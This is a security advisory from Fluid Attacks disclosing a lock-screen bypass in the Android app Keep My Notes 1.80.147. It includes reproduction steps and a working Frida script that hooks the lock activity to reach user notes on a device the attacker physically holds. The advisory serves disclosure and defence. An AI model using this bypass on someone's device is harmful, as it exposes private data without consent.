Keep My Notes 1.80.147 - Improper Access Control

6.1

Medium

Discovered by 

Carlos Bello

Offensive Team, Fluid Attacks

Summary

Full name

Keep My Notes 1.80.147 - Improper Access Control

Code name

State

Public

Release date

Jun 1, 2022

Affected product

Keep My Notes

Affected version(s)

Version 1.80.147

Vulnerability name

Improper Access Control

Remotely exploitable

No

CVSS v3.1 vector string

CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS v3.1 base score

6.1

Exploit available

Yes

CVE ID(s)

Description

An attacker with physical access to the victim's device can bypass the application's password/pin lock to access user data. This is possible due to lack of adequate security controls to prevent dynamic code manipulation.

Proof of Concept

It is important to know that for a successful exploitation, the "Continue" button must be clicked repeatedly.

https://user-images.githubusercontent.com/51862990/168275718-5f8e230f-54f1-4c7c-8393-c58f0dcfda2b.mp4

Steps to reproduce

  1. Install and configure frida as indicated in the following link.

  2. Now just run this command to hook the run function so that it can be dynamically rewritten to bypass application protection.

    frida -U 'Keep My Notes' -l
  3. Now all you have to do is click the "Continue" button 3 or 4 times, then close the application and finally open it again.

System Information

  • Package Name: org.whiteglow.keepmynotes

  • Application Label: Keep My Notes

  • Mobile app version: 1.80.147

  • OS: Android 8.0 (API 26)

Exploit

// exploit.js
Java.perform(() => {
 console.log("[+] Hooking LookScreenActivity - Class f - Method run");
 const LockScreenActivity = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity");
 const f = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity$f");
 f.run.implementation = () => {
        console.log("Bypass Lock Screen");
        LockScreenActivity.$new().d();
    }
})

Mitigation

There is currently no patch available for this vulnerability.

References

Timeline

Vulnerability discovered

May 12, 2022

Vendor Confirmed Vuln.

May 12, 2022

Vendor contacted

May 12, 2022

Public disclosure

Jun 1, 2022

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

SOC 2 Type II

SOC 3

Subscribe to our newsletter

Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.

© 2025 Fluid Attacks. We hack your software.

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

SOC 2 Type II

SOC 3

Subscribe to our newsletter

Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.

© 2025 Fluid Attacks. We hack your software.

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

SOC 2 Type II

SOC 3

Subscribe to our newsletter

Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.

© 2025 Fluid Attacks. We hack your software.